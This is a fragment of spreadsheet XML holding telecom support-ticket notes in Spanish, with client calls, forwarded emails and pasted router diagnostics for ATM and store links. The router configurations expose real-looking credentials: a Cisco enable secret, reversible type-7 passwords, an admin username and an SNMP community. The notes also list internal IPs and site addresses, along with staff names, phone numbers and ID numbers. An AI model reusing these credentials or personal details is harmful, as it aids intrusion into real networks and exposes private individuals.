   	IRVIN YAIR LAZCANO MEJIA
OPER CIAP GESTION Y SOPORTE JR
TEL. +52 55 5174-5299</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 GERARDO INDICA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 1001161529</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 55 5174 5290 CONTESTAN PERO DEJAN LLAMADA EN ESPERA Y NO LA RETOMAN || SE INTENTARA LUEGO **
ID 1001022698
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 52 55 5174 5290 GUADALUPE SANCHEZ DEJA EN ESPERA Y YA NO RETOMA LA LLAMADA
-ID 1001109480</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE, EN ESPERA DE APOYO DE ÉSTOS. ADICIONAL SE PIDE QUE NOS INCLUYAN EN LA COLA DE CORREOS.</t>
  </si>
  <si>
    <t>F4586609</t>
  </si>
  <si>
    <t>###SE VALIDA EN LLAMADA CON TECNICO CON EL CLIENTE  JULISSA DEL CID QUE ENLACE UP Y SE PUEDE PROCEDER AL CIERRE DE TICKET##
CALL CENTER VALIDAR MEDIANTE SD1130933
3001855264
COLA: CNOC_WORK_ORDER
NOMBRE: DE: 58262797
NÚMERO: 58262797
DURACIÓN: 0:08:13
ESTADO: ACD - ASIGNADO A: VELDIN.PALENCIA
DETALLES: 58262797
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: VELDIN.PALENCIA
FECHA Y HORA LOCALES: 2/06/2022 11:38:16</t>
  </si>
  <si>
    <t>F4586622</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6622
ID: 313900273T
IDENTIFICADOR DEL CLIENTE: CC_GMG_GT_INTERNET_Z0_MELCHOR_MENCOS_PETEN
UBICADO EN: INTERNET_CALLE PRINCIPAL ZONA 0 MELCHOR DE MENCOS PETEN
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4586659</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ENCARGADO DE TURNO AL 78533133 CONTESTA LA SEÑORITA  MAGDALENA CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 3001774439
**</t>
  </si>
  <si>
    <t>F4586681</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 2 DE JUNIO DE 2022 16:25
PARA: DARWIN HUSSEIN ESPANA NORIEGA &lt;DARWINH.ESPANA@CLARO.COM.GT&gt;; VICTOR CHOJOLAN &lt;VICTOR.CHOJOLAN@SARLATAM.COM&gt;
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RE: TIENDA 13
*-*-*-*-*</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ELMER MONTENEGRO 35748492 PARA SOLICITAR LOS DATOS DE LA VISITA
-ID 1001013040 - 1001013517
NOMBRE DEL CLIENTE: INDUSTRIA DE HAMBURGUESAS MCDONALDS
UBICACIÓN:CALZADA SAN JUAN 1-83 ZONA 7 CENTRO COMERCIAL PLAZA FLORIDA
CONTACTO EN SITIO: ELMER MONTENEGRO 35748492
HORARIO DE ATENCION: VISITA PARA LAS 10:30
GESTIÓN DE PERMISOS: DATOS DE PERSONAL TECNICO POR CORREO || ASUNTO: RE: TIENDA 13</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VÍCTOR CHOJOLÁN/ELMER MONTENEGRO AL 59221706 / 35748492 INDICAN QUE SI APARECEN CONECTADOS PERO AUN NO CUENTA CON TRANSICION A LA INTERFAZ NUESTRA || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
ID 1001063225 - 1001063365
**</t>
  </si>
  <si>
    <t>-* SE RECIBE CORREO DE CLIENTE, CONFIRMA QUE SE TIENE PERSONAL PROGRAMADO PARA MAÑANA A LAS 10:30 HRS, SE RESPONDE CONSULTANDO EL NUMERO -*
-*
RE: TIENDA 13</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE VÍCTOR CHOJOLÁN 59221706 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001952686</t>
  </si>
  <si>
    <t>F4586686</t>
  </si>
  <si>
    <t>NECESARIO REALIZAR PRUEBAS DE 1 ER NIVEL YA QUE NO SE VE CONECTADO NIGUN DISPSITIVO DESPUES DEL CTC  SEGUN DISEÑIO.</t>
  </si>
  <si>
    <t>F4586690</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SE PROCEDE CON CIERRE .
ROUTER CPE ACTIVO HACE 28 SEMANAS.
UPTIME GENERAL DEL CPE: 28W0D7H4M40S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; TVROUTER  BASE VDSL2/ADSL METH 30 13 VERSION 10.09.24
; WARNING: DYNAMIC CONFIGURATION IS NOT SAVED!
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
   SET HOSTNAME CC_TYT_GT_ATM3395
   SET HOST-LOCATION "CAJERO 3395 C.C. PLAZA VILLA NUEVA, CALZ CONCEPCION 5-00 Z.6 LOCAL 59"
   ADD DEVICE PPP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE ETH-SUBINTERFACE ETHERNET0/1 1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76.185 255.255.255.252
;
;
      REPEATER-SWITCH
; -- SWITCH USER CONFIG --
         PORT 2 DISABLE
         PORT 3 DISABLE
         PORT 4 DISABLE
      EXIT
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      NO AUTO-NEGOTIATION
      DUPLEX FULL
      SPEED 100MBPS
;
   EXIT
;
   NETWORK PPP10
; -- GENERIC PPP USER CONFIGURATION --
      DESCRIPTION " TEL  42717201 ICC 8950201016713540913F/_/47502783T/_/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2783T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      DESCRIPTION "WAN REDUNDANTE/_/47502783T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.141.186 255.255.255.255
;
   EXIT
;
   NETWORK ETHERNET0/1.10
; -- ETHERNET SUBINTERFACE CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47502338T/_/"
      IP ACCESS-GROUP 100 IN
;
;
      IP ADDRESS 10.103.1.19 255.255.255.128
;
      ENCAPSULATION DOT1Q 10
;
;
;
;
;
   EXIT
;
   SET CONSOLE
; -- CONSOLE CONFIGURATION --
      LOGIN BLOCKING 30S
      LOGIN AUTHENTICATION LOCAL
   EXIT
;
   SET TELNET
; -- TELNET USER CONFIGURATION --
      SET MAX-TELNETS 0
   EXIT
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.141.186
      ROUTER-ID 10.212.141.186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233.76.185 DEFAULT
      INTERFACE 10.233.76.185 AREA 0.0.1.101
;
      INTERFACE 10.212.141.186 DEFAULT
      INTERFACE 10.212.141.186 AREA 0.0.1.101
;
      INTERFACE 10.103.1.19 DEFAULT
      INTERFACE 10.103.1.19 AREA 0.0.1.101
      INTERFACE 10.103.1.19 HELLO-INTERVAL 1S
      INTERFACE 10.103.1.19 NETWORK-TYPE NON-BROADCAST
      INTERFACE 10.103.1.19 DEAD-INTERVAL 4S
      INTERFACE 10.103.1.19 ROUTER-PRIORITY 0
;
      NEIGHBOR ETHERNET0/1.10 10.103.1.1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48.83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3395 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1CC_TYT_GT_ATM3395 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
30-0E-D5-32-F9-89     10.233.76.186    238
CC_TYT_GT_ATM3395 ARP+
DUMP ETHERNET0/1.10
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
00-A0-26-C6-46-71     10.103.1.32      189
B4-43-26-00-CD-7D     10.103.1.1       237
00-A0-26-C6-56-BD     10.103.1.34      187
00-A0-26-C6-47-1D     10.103.1.6       67
00-A0-F9-68-DF-A3     10.103.1.42      187
00-A0-26-C6-47-9D     10.103.1.11      189
00-A0-26-C6-55-51     10.103.1.21      189
00-A0-26-C6-47-FD     10.103.1.31      189
CC_TYT_GT_ATM3395 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
ETHERNET0/2  DOWN
ATM0/0  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
PPP10  UP
TNIP10  DOWN
TNIP20  DOWN
LOOPBACK5  UP
ETHERNET0/1.10  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.76.185/30
PPP10              UNNUMBERED - USING GLOBAL-ADDRESS (10.218.48.83)
TNIP10             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
TNIP20             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
LOOPBACK5          10.212.141.186/32
ETHERNET0/1.10     10.103.1.19/25
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.141.186
ROUTER-ID           10.212.141.186
GLOBAL-ADDRESS      10.212.141.186
CC_TYT_GT_ATM3395 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
REGISTRATION STATE: HOME NETWORK
PLMN PUBLIC LAND MOBILE NETWORK CODE: 70401
PLMN PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
CELL LOCATION AREA CODE 0X019D (413), IDENTIFICATION 0X99D9 (39385)
SYSTEM MODE WCDMA, SERVICE DOMAIN: PS
NETWORK TECHNOLOGY CURRENTLY IN USE: HSDPA/HSUPA
RECEIVE SIGNAL CODE POWER OF THE ACTIVE SET'S STRONGEST CELLS(RSCP):  -63 DBM	
TOTAL ENERGY PER CHIP PER POWER DENSITY VALUE OF SET'S STRONGEST CELLS(ECIO):  -3.0 DB	
LAST ECIO MEASURED IN WCDMA DATA MODE:  -4.5 DB	
PRIMARY SCRAMBLING CODE (PSC) 0X01DC (476)
OPERATIONAL STATUS
00000C00
 PSC: 00CA
 SSC: 0000
 STTD: 00
 TOT EC/IO:0265288		MODE:        ONLINE
SYSTEM MODE:   WCDMA      	PS STATE:    ATTACHED
WCDMA BAND:    WCDMA1900  	GSM BAND:    UNKNOWN
WCDMA CHANNEL: 9705		GSM CHANNEL: 65535
GMM (PS) STATE:REGISTERED     	NORMAL SERVICE
MM (CS) STATE: IDLE           	NORMAL SERVICE
WCDMA L1 STATE:L1M_FACH       	RRC STATE:   CELL_FACH
RX LEVEL (DBM):-63
COVERAGE LEVEL: 5 (*****)
CC_TYT_GT_ATM3395 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.103.1.19
  PING 10.103.1.19: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.1.19 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 5/5/6 MS
RUTA IP:
PE: 10.179.28.25
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.103.1.19
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.103.1.19/32  DIRECT  0    0                 0.0.0.0         VLANIF10			</t>
  </si>
  <si>
    <t>F4586697</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 CONTESTA EL SEÑOR DIEGO MORA Y BRINDA LOS NUMEROS DE CONTACTO EN SITIO 70191296 - 27642674 **
ID 3001789467
**</t>
  </si>
  <si>
    <t>*** SE ENVÍAN DATOS DE PERSONAL TÉCNICO A CLIENTE, A LA ESPERA DE CONFIRMACIÓN DE ACCESOS, SE UTILIZA ETAPA PC ***
DE: ANGEL DANIEL TORRES AJTUN &lt;ANGEL.TORRES@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 3 DE JUNIO DE 2022 9:19
PARA: LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; DIEGO MORA (VENDOR) &lt;LUIS.D.MORA@WALMART.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI RIO FRIO ID: CONTR0001566845OC
ESTIMADOS BUEN DÍA,
EN SEGUIMIENTO DEL CASO, FAVOR DE SU APOYO CON LA GESTIÓN DE PERMISOS PARA EL SIGUIENTE PERSONAL, EL CUAL SE ENCUENTRA EN CAMINO HACIA INSTALACIONES REMOTAS Y ESTIMA 2H DE RUTA:
JOSE FRANCISCO ARIAS BARBOZA  CED: 111780548
GIESER YORVASE GUDIEL UPHA    CED: 702400303
OBED SALATIEL GONZALEZ        CED: 0862407961002L
KENDALL MARTINEZ JAMES        CED: 402040422
PLACA: 282157    MARCA: GREAT WALL
CUALQUIER DUDA O COMENTARIO QUEDO A LA ORDEN,
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>***--- SE RESPONDE CORREO A CL Y SE RESTROALIMENTA A CL --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 3 DE JUNIO DE 2022 02:14
PARA: STEVEN MARQUEZ (VENDOR) &lt;STEVEN.MARQUEZ@WALMART.COM&gt;; CORPOWALMART &lt;CORPOWALMART@CLARO.COM.GT&gt;; DIEGO MORA (VENDOR) &lt;LUIS.D.MORA@WALMART.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; MALAQUIAS PANJOJ (VENDOR) &lt;MALAQUIAS.PANJOJ@WALMART.COM&gt;; ROBERTO TOMAS GARCIA GRAMAJO &lt;ROBERTO.GARCIA@CLARO.COM.GT&gt;; SAUL ORELLANA (VENDOR) &lt;SAUL.ORELLANA0@WALMART.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CAM - CENTRO DE CONTROL DE INFRAESTRUCTURA &lt;CAM-CCINFR@WAL-MART.COM&gt;
ASUNTO: RE: ENLACE CAÍDO DE PALI RIO FRIO ID: CONTR0001566845OC
BUENOS DÍAS ESTIMADO SR. STEVEN.
                LAMENTAMOS LOS INCONVENIENTES, PERSONAL A CARGO NOS INDICA QUE NO SE LOGRÓ CONVERSAR CON PERSONAL EN PUNTO ANTES DEL CIERRE DE LA TIENDA.
ESPERAMOS CONTACTARLOS A LAS 07:00 HRS QUE INICIAN LABORES.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 50627642674 IVR INDICA QUE EL NUMERO ESTA PENDIENTE DE INSTALACION
-ID 3001974384</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  50670191296 ENVIA A BUZON, SE INTENTARA LUEGO
-ID 3001973649 - 3001973739</t>
  </si>
  <si>
    <t>**SE LLAMA AL NÚMERO: 50670191296  MANDA A BUZON ||  50627642674 INDICA QUE ES NUMERO INCOMPLETO**
ID 3001954825 - 3001954978
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 2243-7253 MENCIONA QUE YA ESTAN GESTIONADOS LOS PERMISOS PARA PERSONAL TECNICO
-ID 1001051601</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL SITIO 70191296 - 27642674 NO RESPONDEN || SE INTENTARA LUEGO **
ID 3001817324 - 3001817446
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 2243-7253 OPERADORA INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS || SE INTENTARA LUEGO **
ID 3001778162
**</t>
  </si>
  <si>
    <t>F4586791</t>
  </si>
  <si>
    <t xml:space="preserve">SE RPOCEDE CON CIERRE POR PRO BLEMAS DE ENERGIA COMERCIAL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 5 DÍAS.
UPTIME GENERAL DEL CPE: 5D1H12M45S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; TVROUTER  BASE VDSL2/ADSL METH 30 13 VERSION 10.09.24
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
   DESCRIPTION "MONITOREO DEL CNOC"
   SET HOSTNAME CC_TYT_GT_ATM4742
   SET HOST-LOCATION "SECCION A COLONIA SANTA SOFIA, CC EL CORTIJO LOCAL 1 Y 2 SAN JOSE PINULA"
   ADD DEVICE PPP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK AT CELLULAR1/1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NETWORK ETHERNET0/0
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "LAN DEL CLIENTE"
;
      IP ADDRESS 10.233.154.25 255.255.255.252
;
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47503846T/_/"
;
      IP ADDRESS 10.87.32.162 255.255.255.128
;
;
   EXIT
;
   NETWORK PPP10
; -- GENERIC PPP USER CONFIGURATION --
      DESCRIPTION " TEL 37585370 ICC 8950201017773371751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847/_/"
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.180.109 255.255.255.255
;
   EXIT
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.180.109
      ROUTER-ID 10.212.180.109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87.32.162 DEFAULT
      INTERFACE 10.87.32.162 AREA 0.0.1.101
      INTERFACE 10.87.32.162 HELLO-INTERVAL 1S
      INTERFACE 10.87.32.162 NETWORK-TYPE BROADCAST
      INTERFACE 10.87.32.162 DEAD-INTERVAL 4S
      INTERFACE 10.87.32.162 ROUTER-PRIORITY 0
;
      INTERFACE 10.233.154.25 DEFAULT
      INTERFACE 10.233.154.25 AREA 0.0.1.101
;
      INTERFACE 10.212.180.109 DEFAULT
      INTERFACE 10.212.180.109 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.87.32.129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51.1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ENABLE
      EXIT
;
   EXIT
;
   DUMP-COMMAND-ERRORS
   END
CC_TYT_GT_ATM4742 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
DC-99-14-7A-7B-49     10.87.32.129     229
00-A0-26-C6-58-31     10.87.32.132     234
00-A0-F9-68-E2-23     10.87.32.165     234
00-A0-26-C6-48-E1     10.87.32.133     234
00-A0-26-C6-4F-D5     10.87.32.134     234
00-A0-26-C6-4E-25     10.87.32.135     234
00-A0-26-C6-53-91     10.87.32.141     234
00-A0-26-C6-51-41     10.87.32.142     234
00-A0-26-C6-5B-E1     10.87.32.143     234
00-A0-26-C6-5C-21     10.87.32.144     110
00-A0-26-C6-47-A5     10.87.32.145     234
00-A0-26-C6-4C-75     10.87.32.146     234
00-A0-26-C6-55-39     10.87.32.147     234
00-A0-26-C6-46-25     10.87.32.153     234
00-A0-26-C6-47-D9     10.87.32.155     234
CC_TYT_GT_ATM4742 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
00-01-29-76-6E-37     10.233.154.26    233
CC_TYT_GT_ATM4742 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
ETHERNET0/2  DOWN
ATM0/0  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
PPP10  UP
TNIP10  UP
TNIP20  UP
LOOPBACK5  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.154.25/30
ETHERNET0/1        10.87.32.162/25
PPP10              UNNUMBERED - USING GLOBAL-ADDRESS (10.218.51.1)
TNIP10             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
TNIP20             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
LOOPBACK5          10.212.180.109/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.180.109
ROUTER-ID           10.212.180.109
GLOBAL-ADDRESS      10.212.180.109
CC_TYT_GT_ATM4742 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
REGISTRATION STATE: HOME NETWORK
PLMN PUBLIC LAND MOBILE NETWORK CODE: 70401
PLMN PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
CELL LOCATION AREA CODE 0X019E (414), IDENTIFICATION 0XB212 (45586)
SYSTEM MODE WCDMA, SERVICE DOMAIN: PS
NETWORK TECHNOLOGY CURRENTLY IN USE: HSDPA/HSUPA
RECEIVE SIGNAL CODE POWER OF THE ACTIVE SET'S STRONGEST CELLS(RSCP):  -96 DBM	
TOTAL ENERGY PER CHIP PER POWER DENSITY VALUE OF SET'S STRONGEST CELLS(ECIO):  -2.5 DB	
LAST ECIO MEASURED IN WCDMA DATA MODE:  -7.0 DB	
PRIMARY SCRAMBLING CODE (PSC) 0X00C9 (201)
OPERATIONAL STATUS
CURRENT TIME:  435914		TEMPERATURE: 54
BOOTUP TIME:   371386		MODE:        ONLINE
SYSTEM MODE:   WCDMA      	PS STATE:    ATTACHED
WCDMA BAND:    WCDMA1900  	GSM BAND:    UNKNOWN
WCDMA CHANNEL: 9705		GSM CHANNEL: 65535
GMM (PS) STATE:REGISTERED     	NORMAL SERVICE
MM (CS) STATE: IDLE           	NORMAL SERVICE
WCDMA L1 STATE:L1M_FACH       	RRC STATE:   CELL_FACH
RX LEVEL (DBM):-95
COVERAGE LEVEL: 2 (**   )
CC_TYT_GT_ATM4742 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.87.32.162
  PING 10.87.32.162: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.32.162 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.15
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.87.32.162
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.87.32.162/32  DIRECT  0    0                 0.0.0.0         VLANIF10			</t>
  </si>
  <si>
    <t>F4586851</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO SDE PORCEDE CON CIERRE POR ENERGIA COMERCIAL
ROUTER CPE ACTIVO HACE 2 SEMANAS.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CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA UPTIME IS 2 WEEKS, 2 DAYS, 9 HOURS, 28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8012N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CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3402 BYTES
!
VERSION 15.6
SERVICE CONFIG
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_CREDOMATIC_GT_INTERNET_GALERIAS_PRIMMA
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$7C.D$KJKOXSQMJK5SMIRNRSUIS1
ENABLE PASSWORD 7 096C7A5E380643410F
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
!
!
!
IP DHCP EXCLUDED-ADDRESS 192.168.1.1
!
IP DHCP POOL CREDOMATIC
 NETWORK 192.168.1.0 255.255.255.0
 DEFAULT-ROUTER 192.168.1.1
 DNS-SERVER 216.230.147.90 216.230.128.32
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP PRIVILEGE 15 PASSWORD 7 0701041B59590B0E53
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.198.237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DESCRIPTION WAN PRINCIPAL/_/8600204T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.174.226.18 255.255.255.224
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 190.149.59.185 255.255.255.252
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP NAT INSIDE SOURCE LIST 1 INTERFACE VLAN1 OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.174.226.1
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_CALZADA ROOSEVELT 14-63 ZONA 7, CENTRO COMERCIAL GALERC
